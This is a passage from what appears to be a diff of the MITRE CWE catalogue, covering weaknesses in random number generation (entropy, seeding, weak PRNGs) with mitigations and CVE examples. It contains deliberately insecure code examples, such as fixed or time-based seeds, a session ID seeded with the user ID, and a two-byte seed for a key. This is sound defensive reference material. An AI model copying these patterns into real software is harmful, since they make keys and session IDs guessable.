faulty, it would be more secure if it used a random number generator that did not produce predictable receipt identifiers, such as a cryptographic PRNG. + + + + + CVE-2001-0950 + Insufficiently random data used to generate session tokens using C rand(). Also, for certificate/key generation, uses a source that does not block when entropy is low. + https://www.cve.org/CVERecord?id=CVE-2001-0950 + + + CVE-2008-2108 + Chain: insufficient precision (CWE-1339) in + random-number generator causes some zero bits to be reliably + generated, reducing the amount of entropy (CWE-331) + https://www.cve.org/CVERecord?id=CVE-2008-2108 + + + + + Insufficient Entropy + + + 11 + Brute Force + + + MSC32-C + Properly seed pseudorandom number generators + Exact + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Availability + DoS: Crash, Exit, or Restart + If a pseudo-random number generator is using a limited entropy source which runs out (if the generator fails closed), the program may pause or crash. + + + Access Control + Other + Bypass Protection Mechanism + Other + If a PRNG is using a limited entropy source which runs out, and the generator fails open, the generator could produce predictable random numbers. Potentially a weak source of random numbers could weaken the encryption method used for authentication of users. + + + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). + + + Implementation + Consider a PRNG that re-seeds itself as needed from high-quality pseudo-random output, such as hardware devices. + + + Architecture and Design + When deciding which PRNG to use, look at its sources of entropy. Depending on what your security needs are, you may need to use a random number generator that always uses strong random data -- i.e., a random number generator that attempts to be strong but will fail in a weak way or will always provide some middle ground of protection through techniques like re-seeding. Generally, something that always provides a predictable amount of strength is preferable. + + + + + CVE-2019-1715 + security product has insufficient entropy in the DRBG, allowing collisions and private key discovery + https://www.cve.org/CVERecord?id=CVE-2019-1715 + + + + + Insufficient entropy in PRNG + + + MSC02-J + Generate strong random numbers + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block. + The rate at which true random numbers can be generated is limited. It is important that one uses them only when they are needed for security. + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Low + + + Availability + DoS: Crash, Exit, or Restart + A program may crash or block if it runs out of random numbers. + + + + + Implementation + Rather than failing on a lack of random numbers, it is often preferable to wait for more numbers to be created. + + + + + This code uses a TRNG to generate a unique session id for new connections to a server: + + while (1){ + if (haveNewConnection()){if (hwRandom()){int sessionID = hwRandom();createNewConnection(sessionID);} } } + + + + + This code does not attempt to limit the number of new connections or make sure the TRNG can successfully generate a new random number. An attacker may be able to create many new connections and exhaust the entropy of the TRNG. The TRNG may then block and cause the program to crash or hang. + + + + + Failure of TRNG + + + MSC02-J + Generate strong random numbers + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Failure of TRNG + Failure to Handle Insufficient Entropy in TRNG + + + + The number of possible random values is smaller than needed by the product, making it more susceptible to brute force attacks. + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Other + Bypass Protection Mechanism + Other + An attacker could easily guess the values used. This could lead to unauthorized access to a system if the seed is used for authentication and authorization. + + + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems. Consult FIPS 140-2 Annex C ("Approved Random Number Generators"). + + + + + The following XML example code is a deployment descriptor for a Java web application deployed on a Sun Java Application Server. This deployment descriptor includes a session configuration property for configuring the session ID length. + + <sun-web-app> + ...<session-config> + <session-properties><property name="idLengthBytes" value="8"><description>The number of bytes in this web module's session ID.</description></property></session-properties> + </session-config>... + </sun-web-app> + + This deployment descriptor has set the session ID length for this Java web application to 8 bytes (or 64 bits). The session ID length for Java web applications should be set to 16 bytes (128 bits) to prevent attackers from guessing and/or stealing a session ID and taking over a user's session. + Note for most application servers including the Sun Java Application Server the session ID length is by default set to 128 bits and should not be changed. And for many application servers the session ID length cannot be changed from this default setting. Check your application server documentation for the session ID length default setting and configuration options to ensure that the session ID length is set to 128 bits. + + + + + CVE-2002-0583 + Product uses 5 alphanumeric characters for filenames of expense claim reports, stored under web root. + https://www.cve.org/CVERecord?id=CVE-2002-0583 + + + CVE-2002-0903 + Product uses small number of random numbers for a code to approve an action, and also uses predictable new user IDs, allowing attackers to hijack new accounts. + https://www.cve.org/CVERecord?id=CVE-2002-0903 + + + CVE-2003-1230 + SYN cookies implementation only uses 32-bit keys, making it easier to brute force ISN. + https://www.cve.org/CVERecord?id=CVE-2003-1230 + + + CVE-2004-0230 + Complex predictability / randomness (reduced space). + https://www.cve.org/CVERecord?id=CVE-2004-0230 + + + + + Small Space of Random Values + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a Pseudo-Random Number Generator (PRNG) but does not correctly manage seeds. + + + PRNGs are deterministic and, while their output appears + random, they cannot actually create entropy. They rely on + cryptographically secure and unique seeds for entropy so + proper seeding is critical to the secure operation of the + PRNG. + + Management of seeds could be broken down into two main areas: + + + + (1) protecting seeds as cryptographic material (such as a cryptographic key); + + + (2) whenever possible, using a uniquely generated seed from + a cryptographically secure source + + + + PRNGs require a seed as input to generate a stream of + numbers that are functionally indistinguishable from + random numbers. While the output is, in many cases, + sufficient for cryptographic uses, the output of any + PRNG is directly determined by the seed provided as + input. If the seed can be ascertained by a third party, + the entire output of the PRNG can be made known to + them. As such, the seed should be kept secret and + should ideally not be able to be guessed. For example, + the current time may be a poor seed. Knowing the + approximate time the PRNG was seeded greatly reduces + the possible key space. + + + Seeds do not necessarily need to be unique, but reusing seeds may open up attacks if the seed is discovered. + + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Other + Bypass Protection Mechanism + Other + If a PRNG is used incorrectly, such as using the same seed for each initialization or using a predictable seed, then an attacker may be able to easily guess the seed and thus the random numbers. This could lead to unauthorized access to a system if the seed is used for authentication and authorization. + + + + + CVE-2020-7010 + Cloud application on Kubernetes generates passwords using a weak random number generator based on deployment time. + https://www.cve.org/CVERecord?id=CVE-2020-7010 + + + CVE-2019-11495 + server uses erlang:now() to seed the PRNG, which + results in a small search space for potential random + seeds + https://www.cve.org/CVERecord?id=CVE-2019-11495 + + + CVE-2018-12520 + Product's PRNG is not seeded for the generation of session IDs + https://www.cve.org/CVERecord?id=CVE-2018-12520 + + + CVE-2016-10180 + Router's PIN generation is based on rand(time(0)) seeding. + https://www.cve.org/CVERecord?id=CVE-2016-10180 + + + + + PRNG Seed Error + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Modes_of_Introduction, Name, Relationships, Type + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Description, Maintenance_Notes, Observed_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + PRNG Seed Error + + + + A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized. + Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to determine the random numbers that will be produced from the PRNG. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Access Control + Other + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Do not reuse PRNG seeds. Consider a PRNG that periodically re-seeds itself as needed from a high quality pseudo-random output, such as hardware devices. + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible. + + + + + The following code uses a statistical PRNG to generate account IDs. + + private static final long SEED = 1234567890;public int generateAccountID() {Random random = new Random(SEED);return random.nextInt();} + + Because the program uses the same seed value for every invocation of the PRNG, its values are predictable, making the system vulnerable to attack. + + + This code attempts to generate a unique random identifier for a user's session. + + function generateSessionID($userID){srand($userID);return rand();} + + Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. + If the user IDs are generated sequentially, or otherwise restricted to a narrow range of values, then this example also exhibits a Small Seed Space (CWE-339). + + + + + Same Seed in PRNG + + + MSC02-J + Generate strong random numbers + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Modes_of_Introduction, Name, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Modes_of_Introduction, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Same Seed in PRNG + + + + A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time. + The use of predictable seeds significantly reduces the number of possible seeds that an attacker would need to test in order to predict which random numbers will be generated by the PRNG. + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Varies by Context + + + + + Use non-predictable inputs for seed generation. + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible. + + + Implementation + Use a PRNG that periodically re-seeds itself using input from high-quality sources, such as hardware devices with high entropy. However, do not re-seed too frequently, or else the entropy source might block. + + + + + Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number: + + Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt(); + + + srand(time());int randNum = rand(); + + An attacker can easily predict the seed used by these PRNGs, and so also predict the stream of random numbers generated. Note these examples also exhibit CWE-338 (Use of Cryptographically Weak PRNG). + + + + + CVE-2020-7010 + Cloud application on Kubernetes generates passwords using a weak random number generator based on deployment time. + https://www.cve.org/CVERecord?id=CVE-2020-7010 + + + CVE-2019-11495 + server uses erlang:now() to seed the PRNG, which + results in a small search space for potential random + seeds + https://www.cve.org/CVERecord?id=CVE-2019-11495 + + + CVE-2008-0166 + The removal of a couple lines of code caused Debian's OpenSSL Package to only use the current process ID for seeding a PRNG + https://www.cve.org/CVERecord?id=CVE-2008-0166 + + + CVE-2016-10180 + Router's PIN generation is based on rand(time(0)) seeding. + https://www.cve.org/CVERecord?id=CVE-2016-10180 + + + CVE-2018-9057 + cloud provider product uses a non-cryptographically secure PRNG and seeds it with the current time + https://www.cve.org/CVERecord?id=CVE-2018-9057 + + + + + Predictable Seed in PRNG + + + MSC02-J + Generate strong random numbers + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes, Observed_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Predictable Seed in PRNG + + + + The product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong. + + When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks. + Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography. + + + + + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Medium + + + Access Control + Bypass Protection Mechanism + If a PRNG is used for authentication and authorization, such as a session ID or a seed for generating a cryptographic key, then an attacker may be able to easily guess the ID or cryptographic key and gain access to restricted functionality. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Use functions or hardware which use a hardware-based random number generation for all crypto. This is the recommended solution. Use CyptGenRandom on Windows, or hw_rand() on Linux. + + + + + Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number: + + Random random = new Random(System.currentTimeMillis());int accountID = random.nextInt(); + + + srand(time());int randNum = rand(); + + The random number functions used in these examples, rand() and Random.nextInt(), are not considered cryptographically strong. An attacker may be able to predict the random numbers generated by these functions. Note that these example also exhibit CWE-337 (Predictable Seed in PRNG). + + + + + CVE-2009-3278 + Crypto product uses rand() library function to generate a recovery key, making it easier to conduct brute force attacks. + https://www.cve.org/CVERecord?id=CVE-2009-3278 + + + CVE-2009-3238 + Random number generator can repeatedly generate the same value. + https://www.cve.org/CVERecord?id=CVE-2009-3238 + + + CVE-2009-2367 + Web application generates predictable session IDs, allowing session hijacking. + https://www.cve.org/CVERecord?id=CVE-2009-2367 + + + CVE-2008-0166 + SSL library uses a weak random number generator that only generates 65,536 unique keys. + https://www.cve.org/CVERecord?id=CVE-2008-0166 + + + + + Non-cryptographic PRNG + + + MSC30-C + Do not use the rand() function for generating pseudorandom numbers + CWE More Abstract + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can vary widely. Within the developer and other + communities, "randomness" is used heavily. However, within + cryptography, "entropy" is distinct, typically implied as a + measurement. There are no commonly-used definitions, even within + standards documents and cryptography papers. Future versions of + CWE will attempt to define these terms and, if necessary, + distinguish between them in ways that are appropriate for + different communities but do not reduce the usability of CWE for + mapping, understanding, or other scenarios. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Description, Name, Other_Notes + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Description, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Non-cryptographic PRNG + Use of Cryptographically Weak PRNG + + + + A Pseudo-Random Number Generator (PRNG) uses a relatively small seed space, which makes it more susceptible to brute force attacks. + + PRNGs are entirely deterministic once seeded, so it should be extremely difficult to guess the seed. If an attacker can collect the outputs of a PRNG and then brute force the seed by trying every possibility to see which seed matches the observed output, then the attacker will know the output of any subsequent calls to the PRNG. A small seed space implies that the attacker will have far fewer possible values to try to exhaust all possibilities. + + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Varies by Context + + + + + Architecture and Design + Use well vetted pseudo-random number generating algorithms with adequate length seeds. Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a "random enough" number. + + + Architecture and Design + Requirements + Libraries or Frameworks + Use products or modules that conform to FIPS 140-2 [REF-267] to avoid obvious entropy problems, or use the more recent FIPS 140-3 [REF-1192] if possible. + + + + + This code grabs some random bytes and uses them for a seed in a PRNG, in order to generate a new cryptographic key. + + + # getting 2 bytes of randomness for the seeding the PRNG + seed = os.urandom(2) + random.seed(a=seed) + key = random.getrandbits(128) + + + Since only 2 bytes is used as a seed, an attacker will only need to guess 2^16 (65,536) values before being able to replicate the state of the PRNG. + + + + + CVE-2019-10908 + product generates passwords via org.apache.commons.lang.RandomStringUtils, which uses java.util.Random internally. This PRNG has only a 48-bit seed. + https://www.cve.org/CVERecord?id=CVE-2019-10908 + + + + + Small Seed Space in PRNG + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This entry may have a chaining relationship with predictable from observable state (CWE-341). + As of CWE 4.5, terminology related to randomness, entropy, and + predictability can 